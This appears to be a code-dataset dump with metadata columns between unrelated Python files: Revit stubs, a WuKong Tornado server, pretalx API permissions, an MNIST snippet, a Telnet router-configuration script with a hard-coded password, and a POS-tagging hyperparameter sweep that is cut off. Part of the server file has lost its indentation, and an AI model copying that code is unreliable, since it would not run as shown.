] | null | null | null | release/stubs.min/Revit/References.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Revit/References.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | # encoding: utf-8
# module Revit.References calls itself References
# from RevitNodes,Version=1.2.1.3083,Culture=neutral,PublicKeyToken=null
# by generator 1.145
# no doc
# no imports
# no functions
# classes
class RayBounce(object):
    # no doc
    @staticmethod
    def ByOriginDirection(origin, direction, maxBounces, view):
        """
        ByOriginDirection(origin: Point,direction: Vector,maxBounces: int,view: View3D) -> Dictionary[str,object]

        Returns positions and elements hit by ray bounce from the specified origin
        point and direction
        """
        pass
__all__ = [
"ByOriginDirection",
]
| 22.033333 | 108 | 0.665658 | 73 | 661 | 5.972603 | 0.726027 | 0.022936 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026104 | 0.246596 | 661 | 29 | 109 | 22.793103 | 0.849398 | 0.618759 | 0 | 0 | 0 | 0 | 0.086294 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.142857 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
fcb6327d7e4cb1ae556990fbbdbb879671eea3d2 | 5,479 | py | Python | wukong/master/dbserver.py | fakewen/Monitoring-branch | cb5516d7cd4eaac3f88f32dc37fdff622f3a6655 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | wukong/master/dbserver.py | fakewen/Monitoring-branch | cb5516d7cd4eaac3f88f32dc37fdff622f3a6655 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | wukong/master/dbserver.py | fakewen/Monitoring-branch | cb5516d7cd4eaac3f88f32dc37fdff622f3a6655 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | #!/usr/bin/python
# vim: ts=2 sw=2 expandtab
# author: Penn Su
import dateutil.parser
from gevent import monkey; monkey.patch_all()
import gevent
import serial
import platform
import os, sys, zipfile, re, time
import tornado.ioloop, tornado.web
import tornado.template as template
import simplejson as json
from jinja2 import Template
import logging
import hashlib
from threading import Thread
import traceback
import StringIO
import shutil, errno
import datetime
from datetime import date, timedelta
import glob
import copy
import fcntl, termios, struct
from types import *
import tornado.options
tornado.options.define("appdir", type=str, help="Directory that contains the applications")
tornado.options.parse_command_line()
from configuration_db import *
if WKPFCOMM_AGENT == "ZWAVE":
  try:
    import pyzwave
    m = pyzwave.getDeviceType
  except:
    print "Please install the pyzwave module in the wukong/tools/python/pyzwave by using"
    print "cd ../tools/python/pyzwave; sudo python setup.py install"
    sys.exit(-1)
import pymongo
import tornado.options
if(MONITORING == 'true'):
  try:
    from pymongo import MongoClient
  except:
    print "Please install python mongoDB driver pymongo by using"
    print "easy_install pymongo"
    sys.exit(-1)
  try:
    mongoDBClient = MongoClient(MONGODB_URL)
  except:
    print "MongoDB instance " + MONGODB_URL + " can't be connected."
    print "Please install the mongDB, pymongo module."
    sys.exit(-1)
tornado.options.parse_command_line()
#tornado.options.enable_pretty_logging()
IP = sys.argv[1] if len(sys.argv) >= 2 else '127.0.0.1'
landId = 100
node_infos = []
from make_js import make_main
from make_fbp import fbp_main
def import_wuXML():
  make_main()
def make_FBP():
  test_1 = fbp_main()
  test_1.make()
wkpf.globals.location_tree = LocationTree(LOCATION_ROOT)
def initializeVirtualNode():
  # Add the server as a virtual Wudevice for monitoring
  wuclasses = {}
  wuobjects = {}
  # 1 is by default the network id of the controller
  node = WuNode(1, '/' + LOCATION_ROOT, wuclasses, wuobjects, 'virtualdevice')
  wuclassdef = WuObjectFactory.wuclassdefsbyid[44]
  wuobject = WuObjectFactory.createWuObject(wuclassdef, node, 1, False)
  wkpf.globals.virtual_nodes[1] = node
# using cloned nodes
def rebuildTree(nodes):
  nodes_clone = copy.deepcopy(nodes)
  wkpf.globals.location_tree = LocationTree(LOCATION_ROOT)
  wkpf.globals.location_tree.buildTree(nodes_clone)
  flag = os.path.exists("../LocalData/landmarks.txt")
  if(flag):
    wkpf.globals.location_tree.loadTree()
  wkpf.globals.location_tree.printTree()
# Helper functions
def setup_signal_handler_greenlet():
  logging.info('setting up signal handler')
  gevent.spawn(wusignal.signal_handler)
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
def copyAnything(src, dst):
try:
shutil.copytree(src, dst)
except OSError as exc: # python >2.5
exc_type, exc_value, exc_traceback = sys.exc_info()
print traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
if exc.errno == errno.ENOTDIR:
shutil.copy(src, dst)
else: raise
def getAppIndex(app_id):
# make sure it is not unicode
app_id = app_id.encode('ascii','ignore')
for index, app in enumerate(wkpf.globals.applications):
if app.id == app_id:
return index
return None
def delete_application(i):
try:
shutil.rmtree(wkpf.globals.applications[i].dir)
wkpf.globals.applications.pop(i)
return True
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
print traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
return False
def load_app_from_dir(dir):
app = WuApplication(dir=dir)
app.loadConfig()
return app
def update_applications():
logging.info('updating applications:')
application_basenames = [os.path.basename(app.dir) for app in wkpf.globals.applications]
for dirname in os.listdir(APP_DIR):
app_dir = os.path.join(APP_DIR, dirname)
if dirname.lower() == 'base': continue
if not os.path.isdir(app_dir): continue
logging.info('scanning %s:' % (dirname))
if dirname not in application_basenames:
logging.info('%s' % (dirname))
wkpf.globals.applications.append(load_app_from_dir(app_dir))
application_basenames = [os.path.basename(app.dir) for app in wkpf.globals.applications]
class idemain(tornado.web.RequestHandler):
def get(self):
self.content_type='text/html'
self.render('templates/ide.html')
# List all uploaded applications
class main(tornado.web.RequestHandler):
def get(self):
print "[WEB PORT]= %d" %(MONITORING_BUFSIZE)
getComm()
self.render('templates/application.html', connected=wkpf.globals.connected)
settings = dict(
static_path=os.path.join(os.path.dirname(__file__), "static"),
debug=True
)
ioloop = tornado.ioloop.IOLoop.instance()
wukong = tornado.web.Application([
(r"/", main),
(r"/ide", idemain),
(r"/main", main),
], IP, **settings)
logging.info("Starting up...")
setup_signal_handler_greenlet()
WuClassLibraryParser.read(COMPONENTXML_PATH)
initializeVirtualNode();
#WuNode.loadNodes()
update_applications()
import_wuXML()
make_FBP()
wukong.listen(MASTER_PORT)
if __name__ == "__main__":
ioloop.start()
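The `allowed_file` helper above is a plain extension whitelist. A minimal, self-contained Python 3 sketch of the same check follows; the `ALLOWED_EXTENSIONS` value here is a hypothetical stand-in for the set imported from `configuration_db`, not the project's actual configuration:

```python
# Hypothetical whitelist standing in for the one from configuration_db
ALLOWED_EXTENSIONS = {"xml", "zip", "wkpf"}

def allowed_file(filename):
    # Accept only names that have an extension and whose extension is whitelisted
    return "." in filename and filename.rsplit(".", 1)[1] in ALLOWED_EXTENSIONS

print(allowed_file("app.xml"))  # True
print(allowed_file("app.exe"))  # False
print(allowed_file("noext"))    # False
```

`rsplit(".", 1)` splits on the last dot only, so `archive.tar.zip` is judged by `zip`.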
| 27.258706 | 94 | 0.72203 | 732 | 5,479 | 5.269126 | 0.363388 | 0.037075 | 0.035779 | 0.029816 | 0.151932 | 0.136375 | 0.118745 | 0.094374 | 0.094374 | 0.094374 | 0 | 0.006806 | 0.168644 | 5,479 | 200 | 95 | 27.395 | 0.839956 | 0.05877 | 0 | 0.176471 | 0 | 0 | 0.111176 | 0.020019 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.20915 | null | null | 0.065359 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcbf89d16af8b8207c6990c30ee128a79effbc4f | 963 | py | Python | src/pretalx/api/permissions.py | lili668668/pretalx | 5ba2185ffd7c5f95254aafe25ad3de340a86eadb | [
"Apache-2.0"
] | 418 | 2017-10-05T05:52:49.000Z | 2022-03-24T09:50:06.000Z | src/pretalx/api/permissions.py | lili668668/pretalx | 5ba2185ffd7c5f95254aafe25ad3de340a86eadb | [
"Apache-2.0"
] | 1,049 | 2017-09-16T09:34:55.000Z | 2022-03-23T16:13:04.000Z | src/pretalx/api/permissions.py | lili668668/pretalx | 5ba2185ffd7c5f95254aafe25ad3de340a86eadb | [
"Apache-2.0"
] | 155 | 2017-10-16T18:32:01.000Z | 2022-03-15T12:48:33.000Z | from rest_framework.permissions import SAFE_METHODS, BasePermission
class ApiPermission(BasePermission):
    def _has_permission(self, view, obj, request):
        event = getattr(request, "event", None)
        if not event:  # Only true for root API view
            return True

        if request.method in SAFE_METHODS:
            read_permission = getattr(view, "read_permission_required", None)
            if read_permission:
                return request.user.has_perm(read_permission, obj)
            return True

        write_permission = getattr(view, "write_permission_required", None)
        if write_permission:
            return request.user.has_perm(write_permission, obj)
        return False

    def has_permission(self, request, view):
        return self._has_permission(view, getattr(request, "event", None), request)

    def has_object_permission(self, request, view, obj):
        return self._has_permission(view, obj, request)
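The resolution order above (no event means allow; safe methods check `read_permission_required`; all other methods check `write_permission_required`) can be exercised without Django or DRF using small stand-in objects. Everything below is a hypothetical stub for illustration, not pretalx code:

```python
SAFE_METHODS = ("GET", "HEAD", "OPTIONS")  # mirrors rest_framework.permissions

class StubUser:
    def __init__(self, perms):
        self.perms = perms
    def has_perm(self, perm, obj):
        return perm in self.perms

class StubRequest:
    def __init__(self, method, user, event="demo-event"):
        self.method, self.user, self.event = method, user, event

class StubView:
    read_permission_required = "event.view"
    write_permission_required = "event.change"

def has_permission(view, obj, request):
    # Same branching as ApiPermission._has_permission above
    event = getattr(request, "event", None)
    if not event:
        return True
    if request.method in SAFE_METHODS:
        read_permission = getattr(view, "read_permission_required", None)
        if read_permission:
            return request.user.has_perm(read_permission, obj)
        return True
    write_permission = getattr(view, "write_permission_required", None)
    if write_permission:
        return request.user.has_perm(write_permission, obj)
    return False

reader = StubUser({"event.view"})
print(has_permission(StubView(), None, StubRequest("GET", reader)))   # True
print(has_permission(StubView(), None, StubRequest("POST", reader)))  # False
```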
| 37.038462 | 83 | 0.678089 | 113 | 963 | 5.566372 | 0.327434 | 0.082671 | 0.050874 | 0.063593 | 0.193959 | 0.108108 | 0 | 0 | 0 | 0 | 0 | 0 | 0.244029 | 963 | 25 | 84 | 38.52 | 0.864011 | 0.028037 | 0 | 0.105263 | 0 | 0 | 0.063169 | 0.052463 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0 | 0.052632 | 0.105263 | 0.631579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
fcc1a1236f02872e188e0996c48dca2fa8535f2a | 471 | py | Python | za/minstData/test.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | za/minstData/test.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | za/minstData/test.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | #%%
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
import cv2
import numpy as np
import shutil
import random
from zipfile import ZipFile
rootPath = '..\..\dataAndModel\data\mnist\\'
for file in ["train", "test"]:
    path = rootPath + file
    print(os.listdir(path))
# %%
image_paths = [rootPath + 'train\\' + file for file in os.listdir(rootPath + 'train') ]
# %%
image_paths
# %%
image = cv2.imread(image_paths[0])
# %%
image.shape
# %%
image_paths[0]
# %%
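The hard-coded backslashes in `rootPath` tie the script to Windows; `os.path.join` builds the same paths on any OS. The sketch below creates a throwaway directory layout in a temp folder purely for illustration — the real mnist data root is not touched:

```python
import os
import tempfile

# Hypothetical stand-in for the mnist data root used above
root = tempfile.mkdtemp()
for split in ("train", "test"):
    os.makedirs(os.path.join(root, split), exist_ok=True)

train_dir = os.path.join(root, "train")
# Touch two fake image files so listdir has something to return
for name in ("0.png", "1.png"):
    open(os.path.join(train_dir, name), "w").close()

image_paths = [os.path.join(train_dir, f) for f in sorted(os.listdir(train_dir))]
print(len(image_paths))  # 2
```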
| 17.444444 | 88 | 0.656051 | 63 | 471 | 4.809524 | 0.507937 | 0.132013 | 0.059406 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012788 | 0.169851 | 471 | 26 | 89 | 18.115385 | 0.762148 | 0.042463 | 0 | 0 | 0 | 0 | 0.166667 | 0.06982 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
fccd89561bcf68c7f9ec8902df57d34730dab901 | 1,021 | py | Python | Python_Network_Automation/input_num_ports/input_port_num.py | yasser296/Python-Projects | eae3598e2d4faf08d9def92c8b417c2e7946c5f4 | [
"MIT"
] | null | null | null | Python_Network_Automation/input_num_ports/input_port_num.py | yasser296/Python-Projects | eae3598e2d4faf08d9def92c8b417c2e7946c5f4 | [
"MIT"
] | null | null | null | Python_Network_Automation/input_num_ports/input_port_num.py | yasser296/Python-Projects | eae3598e2d4faf08d9def92c8b417c2e7946c5f4 | [
"MIT"
] | null | null | null | import getpass
import telnetlib
port_num = str(input("Enter the Number of Port and type: "))
HOST = "10.1.1.1"
user = input("\nEnter The Username: ")
password = getpass.getpass()
tn = telnetlib.Telnet(HOST)
tn.read_until(b"Username: ")
tn.write(user.encode('ascii') + b"\n")
if password:
    tn.read_until(b"Password: ")
    tn.write(password.encode('ascii') + b"\n")
tn.write(b"enable \n")
tn.write(b"123\n")
tn.write(b"config t \n")
tn.write(b"hostname " + user.encode('ascii') + b"\n")
tn.write(b"banner motd #Hello!# \n")
tn.write(b"interface " + str(port_num).encode('ascii') + b"\n")
# tn.write(b"interface s2/0 \n")
tn.write(b"no shutdown \n")
tn.write(b"ip address 10.1.2.1 255.255.255.0 \n")
tn.write(b"exit \n")
tn.write(b"exit \n")  # To exit from global configuration mode
tn.write(b"exit \n")  # To exit from privileged EXEC mode so the session is closed
tn.write(b"exit \n")  # To exit from the terminal (cmd)
print("\nDone")
input("Just Press Enter To Exit!")
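The back-to-back `tn.write` calls can be factored into a helper that first renders the configuration as a list of byte strings, which makes the command sequence testable without a live device. The function name and command set below are illustrative, not part of the original script:

```python
def build_config_commands(hostname, interface, ip, mask):
    # Render the IOS-style configuration used above as bytes ready for Telnet.write
    lines = [
        "enable",
        "config t",
        "hostname " + hostname,
        "interface " + interface,
        "no shutdown",
        "ip address " + ip + " " + mask,
        "exit",
    ]
    return [(line + "\n").encode("ascii") for line in lines]

commands = build_config_commands("R1", "s2/0", "10.1.2.1", "255.255.255.0")
print(commands[2])  # b'hostname R1\n'
```

In the script above, one would then loop `for cmd in commands: tn.write(cmd)`.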
| 26.179487 | 79 | 0.641528 | 179 | 1,021 | 3.636872 | 0.363128 | 0.16129 | 0.159754 | 0.152074 | 0.3149 | 0.22427 | 0.202765 | 0.105991 | 0 | 0 | 0 | 0.029586 | 0.17238 | 1,021 | 38 | 80 | 26.868421 | 0.740828 | 0.152791 | 0 | 0.153846 | 0 | 0 | 0.351582 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.192308 | 0.076923 | 0 | 0.076923 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
fcd03cda24a62b52462ec71d4e75a58d63dacc27 | 22,521 | py | Python | transformers/script_tune_multi_pos.py | rizwan09/NLPDV | 2fa05421319db106e7a2befe6c3720a9c136c292 | [
"MIT"
] | 2 | 2021-04-27T19:56:28.000Z | 2021-08-19T05:34:37.000Z | transformers/script_tune_multi_pos.py | rizwan09/NLPDV | 2fa05421319db106e7a2befe6c3720a9c136c292 | [
"MIT"
] | 5 | 2021-05-03T14:40:33.000Z | 2021-05-03T14:40:34.000Z | transformers/script_tune_multi_pos.py | rizwan09/NLPDV | 2fa05421319db106e7a2befe6c3720a9c136c292 | [
"MIT"
] | null | null | null | import os, pdb
# ______________________________________NLPDV____________________________________
# _______________________________________________________________________
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from transformers import *
import _pickle as pkl
import shutil
import numpy as np
from tqdm import trange, tqdm
# _______________________________________________________________________
# ______________________________________NLPDV____________________________________
#gpu 0,2 on NLP9 are culprit gpu 3,4 on nlp8
CUDA_VISIBLE_DEVICES = [0,1,3,4,5,6,7]
BASE_DATA_DIR = '/local/rizwan/UDTree/'
run_file = './examples/run_multi_domain_pos.py'
model_type = 'bert'
train_model_name_or_path = 'bert-base-multilingual-cased' # 'bert-large-uncased-whole-word-masking'
do_lower_case = False
num_train_epochs = 4.0
num_eval_epochs = 1.0
per_gpu_eval_batch_size = 32
per_gpu_train_batch_size = 32
learning_rate = 5e-5
max_seq_length = 128
fp16 = True
overwrite_cache = False
evaluate_during_training = True
#batch sizes: 8, 16, 32, 64, 128 (for max seq 128, max batch size is 32)
#learning rates: 3e-4, 1e-4, 5e-5, 3e-5, 2e-5
'''
Runs:
'''
ALL_EVAL_TASKS = [
'UD_ARABIC',
'UD_BASQUE',
'UD_BULGARIAN',
'UD_CATALAN',
'UD_CHINESE',
'UD_CROATIAN',
'UD_CZECH',
'UD_DANISH',
'UD_DUTCH',
'UD_ENGLISH',
'UD_FINNISH',
'UD_FRENCH',
'UD_GERMAN',
'UD_HEBREW',
'UD_HINDI',
'UD_INDONESIAN',
'UD_ITALIAN',
'UD_JAPANESE',
'UD_KOREAN',
'UD_NORWEGIAN',
'UD_PERSIAN',
'UD_POLISH',
'UD_PORTUGUESE',
'UD_ROMANIAN',
'UD_RUSSIAN',
'UD_SERBIAN',
'UD_SLOVAK',
'UD_SLOVENIAN',
'UD_SPANISH',
'UD_SWEDISH',
'UD_TURKISH']
shpley_removals = {
'UD_ARABIC': [0, 3, 7, 8, 11, 13, 16, 21, 29],
'UD_BASQUE': [17, 19],
'UD_BULGARIAN': [3, 19], #[3, 13, 17, 19],
'UD_CATALAN': [ 0, 3, 17, 19, 20],
'UD_CHINESE':[5, 13, 20, 25, 26],
'UD_CROATIAN': [13, 17, 19],
'UD_CZECH': [13, 17, 19],
'UD_DANISH': [13],
'UD_DUTCH': [17,19],
'UD_ENGLISH': [0, 3, 5, 6, 8, 10, 11, 12, 13, 15, 16, 17, 18, 19, 20, 21, 23, 24, 25, 26, 29],
'UD_FINNISH': [13, 17, 19],
'UD_FRENCH': [17],
'UD_GERMAN': [ 17, 19], # Try with [3, 5, 16, 17, 19, 20]
'UD_HEBREW': [17],
'UD_HINDI': [ 0, 17, 19],
'UD_INDONESIAN': [ 0, 13, 17, 19],
'UD_ITALIAN': [ 5, 17, 19, 20],
'UD_JAPANESE': [19],
'UD_KOREAN': [ 0, 13, 19],
'UD_NORWEGIAN': [0, 13, 19],
'UD_PERSIAN': [4, 17, 19],
'UD_POLISH': [13, 17, 19],
'UD_PORTUGUESE': [17],
'UD_ROMANIAN': [ 13, 17, 19],
'UD_RUSSIAN': [ 13, 17, 19],
'UD_SERBIAN': [ 13, 17, 19],
'UD_SLOVAK': [ 13, 17, 19],
'UD_SLOVENIAN': [17],
'UD_SPANISH':[5, 17, 19],
'UD_SWEDISH':[17],
'UD_TURKISH': [13, 17, 19]
}
all_acc_shapley = {eval_task_name:[] for eval_task_name in ALL_EVAL_TASKS}
all_acc_baseline = {eval_task_name:[] for eval_task_name in ALL_EVAL_TASKS}
all_acc_baseline_s = {eval_task_name:[] for eval_task_name in ALL_EVAL_TASKS}
is_tune=True
BASELINES_S = 'baseline-s'
if not is_tune: num_train_epochs=4.0
for eval_task_name in ['UD_FINNISH']:
    if len(shpley_removals[eval_task_name]) < 1: continue
    for i in range(1):
        seed = 43
        np.random.seed(seed)
        for is_few_shot in [False]:
            best_shapley_learning_rate = None
            best_shapley_per_gpu_train_batch_size = None
            best_baseline_learning_rate = None
            best_baseline_per_gpu_train_batch_size = None
            best_baseline_s_learning_rate = None
            best_baseline_s_per_gpu_train_batch_size = None
            BEST_BASELINE_ACC = None
            BEST_SHAPLEY_ACC = None
            for is_Shapley in [BASELINES_S, ]:
                best_learning_rate = None
                best_per_gpu_train_batch_size = None
                best_acc = -1
                if BEST_BASELINE_ACC and BEST_SHAPLEY_ACC and BEST_BASELINE_ACC > BEST_SHAPLEY_ACC: continue
                # _______________________________________________________________________
                # ______________________________________NLPDV____________________________________
                ALL_BINARY_TASKS = [
                    'UD_ARABIC',
                    'UD_BASQUE',
                    'UD_BULGARIAN',
                    'UD_CATALAN',
                    'UD_CHINESE',
                    'UD_CROATIAN',
                    'UD_CZECH',
                    'UD_DANISH',
                    'UD_DUTCH',
                    'UD_ENGLISH',
                    'UD_FINNISH',
                    'UD_FRENCH',
                    'UD_GERMAN',
                    'UD_HEBREW',
                    'UD_HINDI',
                    'UD_INDONESIAN',
                    'UD_ITALIAN',
                    'UD_JAPANESE',
                    'UD_KOREAN',
                    'UD_NORWEGIAN',
                    'UD_PERSIAN',
                    'UD_POLISH',
                    'UD_PORTUGUESE',
                    'UD_ROMANIAN',
                    'UD_RUSSIAN',
                    'UD_SERBIAN',
                    'UD_SLOVAK',
                    'UD_SLOVENIAN',
                    'UD_SPANISH',
                    'UD_SWEDISH',
                    'UD_TURKISH']
                DOMAIN_TRANSFER = True
                # _______________________________________________________________________
                # ______________________________________NLPDV____________________________________
                if eval_task_name in ALL_BINARY_TASKS: ALL_BINARY_TASKS.remove(eval_task_name)
                if is_Shapley == BASELINES_S:
                    raddom_domains = np.random.choice(np.arange(len(ALL_BINARY_TASKS)),
                                                      len(shpley_removals[eval_task_name]), replace=False)
                learning_rates = [2e-5, 3e-5, 5e-5]
                bz_szs = [16, 32]
                for learning_rate in learning_rates:
                    for per_gpu_train_batch_size in bz_szs:
                        train_task_name = eval_task_name
                        if is_Shapley == 'LOO':
                            train_output_dir = 'temp/' + train_task_name + '_output_LOO_' + str(per_gpu_train_batch_size) + '_' + str(learning_rate)  # +str(seed)+'/'
                        elif is_Shapley == True:
                            train_output_dir = 'temp/' + train_task_name + '_output_Shapley_' + str(per_gpu_train_batch_size) + '_' + str(learning_rate)  # +str(seed)+'/'
                        elif is_Shapley == BASELINES_S:
                            train_output_dir = 'temp/' + train_task_name + '_output_baseline-s_' + str(
                                per_gpu_train_batch_size) + '_' + str(learning_rate)  # +str(seed)+'/'
                        else:
                            train_output_dir = 'temp/' + train_task_name + '_output_baseline_' + str(per_gpu_train_batch_size) + '_' + str(learning_rate)  # +str(seed)+'/'
                        eval_output_dir = train_output_dir + '/best'
                        train_data_dir = BASE_DATA_DIR
                        eval_data_dir = BASE_DATA_DIR
                        directory = eval_output_dir
                        if not os.path.exists(train_output_dir):
                            os.makedirs(directory)
                            os.makedirs(os.path.join(directory, 'plots'))
                        if not os.path.exists(directory):
                            os.makedirs(directory)
                            os.makedirs(os.path.join(directory, 'plots'))

                        def write_indices_to_delete(indices_to_delete_file_path, ids):
                            with open(indices_to_delete_file_path, "w") as writer:
                                print(f"***** Writing ids to {str(indices_to_delete_file_path)} *****", flush=True)
                                for id in ids:
                                    writer.write("%s " % (id))

                        indices_to_delete_file_path = directory + '/indices_to_delete_file_path' + '.json'
                        if is_Shapley == True and eval_task_name != 'UD_TURKISH':
                            write_indices_to_delete(indices_to_delete_file_path, shpley_removals[eval_task_name])
                        if is_Shapley == BASELINES_S and eval_task_name != 'UD_TURKISH':
                            print('-eval_task_name: ', eval_task_name, flush=True)
                            print('raddom_removal_domains: ', raddom_domains,
                                  'shapley removals: ', shpley_removals[eval_task_name], flush=True)
                            write_indices_to_delete(indices_to_delete_file_path, raddom_domains)
                        # if is_Shapley == False and eval_task_name == 'UD_ENGLISH':
                        #     write_indices_to_delete(indices_to_delete_file_path, \
                        #         [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 28, 29])
                        # else is_Shapley: continue
                        run_command = "CUDA_VISIBLE_DEVICES=" + str(CUDA_VISIBLE_DEVICES[0])
                        for i in CUDA_VISIBLE_DEVICES[1:]:
                            run_command += ',' + str(i)
                        run_command += ' python '
                        if len(CUDA_VISIBLE_DEVICES) > 1: run_command += '-m torch.distributed.launch --nproc_per_node ' \
                            + str(len(CUDA_VISIBLE_DEVICES))
                        run_command += ' ' + run_file + ' ' + ' --model_type ' + model_type + \
                            ' --max_seq_length ' + str(max_seq_length) + ' --per_gpu_eval_batch_size=' + str(
                            per_gpu_eval_batch_size) + \
                            ' --per_gpu_train_batch_size=' + str(per_gpu_train_batch_size) + ' --learning_rate ' + str(learning_rate) \
                            + ' --overwrite_output_dir '
                        if do_lower_case: run_command += '--do_lower_case '
                        if fp16: run_command += ' --fp16 '
                        if overwrite_cache:
                            run_command += ' --overwrite_cache '
                        if evaluate_during_training: run_command += ' --evaluate_during_training '
                        # For training:
                        train_run_command = run_command + ' --do_train --task_name ' + train_task_name + \
                            ' --data_dir ' + train_data_dir + ' --output_dir ' + \
                            train_output_dir + ' --model_name_or_path ' + train_model_name_or_path
                        if is_Shapley: train_run_command += ' --indices_to_delete_file_path ' + indices_to_delete_file_path
                        if is_few_shot: train_run_command += ' --is_few_shot'
                        command = train_run_command + ' --num_train_epochs 1'
                        print(command, flush=True)
                        if not os.path.exists(os.path.join(eval_output_dir, "pytorch_model.bin")):
                            os.system(command)
                        # initial Eval on whole dataset
                        # For eval:
                        run_command = "CUDA_VISIBLE_DEVICES=" + str(CUDA_VISIBLE_DEVICES[0])
                        run_command += ' python '
                        run_command += ' ' + run_file + ' ' + ' --model_type ' + model_type + \
                            ' --max_seq_length ' + str(max_seq_length) + ' --per_gpu_eval_batch_size=' + str(
                            per_gpu_eval_batch_size) + \
                            ' --per_gpu_train_batch_size=' + str(
                            per_gpu_train_batch_size) + ' --learning_rate ' + str(learning_rate) \
                            + ' --overwrite_output_dir '
                        if do_lower_case: run_command += '--do_lower_case '
                        if fp16: run_command += ' --fp16 '
                        if overwrite_cache:
                            run_command += ' --overwrite_cache '
                        if evaluate_during_training: run_command += ' --evaluate_during_training '
                        eval_run_command = run_command + ' --do_eval --task_name ' + eval_task_name + \
                            ' --data_dir ' + eval_data_dir + ' --output_dir ' + eval_output_dir + \
                            ' --model_name_or_path ' + eval_output_dir
                        command = eval_run_command
                        print(command, flush=True)
                        os.system(command)
                        try:
                            output_eval_file = os.path.join(eval_output_dir, "eval_results.txt")
                            with open(output_eval_file, "r") as reader:
                                for line in reader:
                                    line = line.strip().split()
                                    key = line[0]
                                    value = line[-1]
                                    if key in ['acc']:
                                        acc = float(value)
                        except:
                            acc = 0
                        print('-' * 100, flush=True)
                        print("Task: ", train_task_name, flush=True)
                        print("learning_rate: ", learning_rate, flush=True)
                        print("per_gpu_train_batch_size: ", per_gpu_train_batch_size, flush=True)
                        print("Acc: ", acc, flush=True)
                        print("Shapley: ", str(is_Shapley), flush=True)
                        print('-' * 100, flush=True)
                        if is_Shapley == True:
                            all_acc_shapley[eval_task_name].append(acc)
                        elif is_Shapley == False:
                            all_acc_baseline[eval_task_name].append(acc)
                        else:
                            all_acc_baseline_s[eval_task_name].append(acc)
                        if acc > best_acc:
                            best_per_gpu_train_batch_size = per_gpu_train_batch_size
                            best_learning_rate = learning_rate
                            best_acc = acc
                print('-' * 100, flush=True)
                print('-Task: ', eval_task_name, flush=True)
                print('-is_Shapley: ', is_Shapley, flush=True)
                print('-best lr: ', best_learning_rate, '\n-bz sz: ', best_per_gpu_train_batch_size,
                      '\n-best acc: ', best_acc, '\n-all_acc_shapley: ', all_acc_shapley,
                      '\n-all_acc_shapley_baseline_s: ', all_acc_baseline_s, '\n- all_acc_baseline: ', all_acc_baseline, flush=True)
                print('-' * 100, flush=True)
                # For Test:
                train_task_name = eval_task_name
                if is_Shapley == 'LOO':
                    train_output_dir = 'temp/' + train_task_name + '_output_LOO_' + str(
                        best_per_gpu_train_batch_size) + '_' + str(
                        best_learning_rate)  # +str(seed)+'/'
                elif is_Shapley == True:
                    train_output_dir = 'temp/' + train_task_name + '_output_Shapley_' + str(
                        best_per_gpu_train_batch_size) + '_' + str(best_learning_rate)  # +str(seed)+'/'
                elif is_Shapley == BASELINES_S:
                    train_output_dir = 'temp/' + train_task_name + '_output_baseline-s_' + str(
                        best_per_gpu_train_batch_size) + '_' + str(best_learning_rate)  # +str(seed)+'/'
                else:
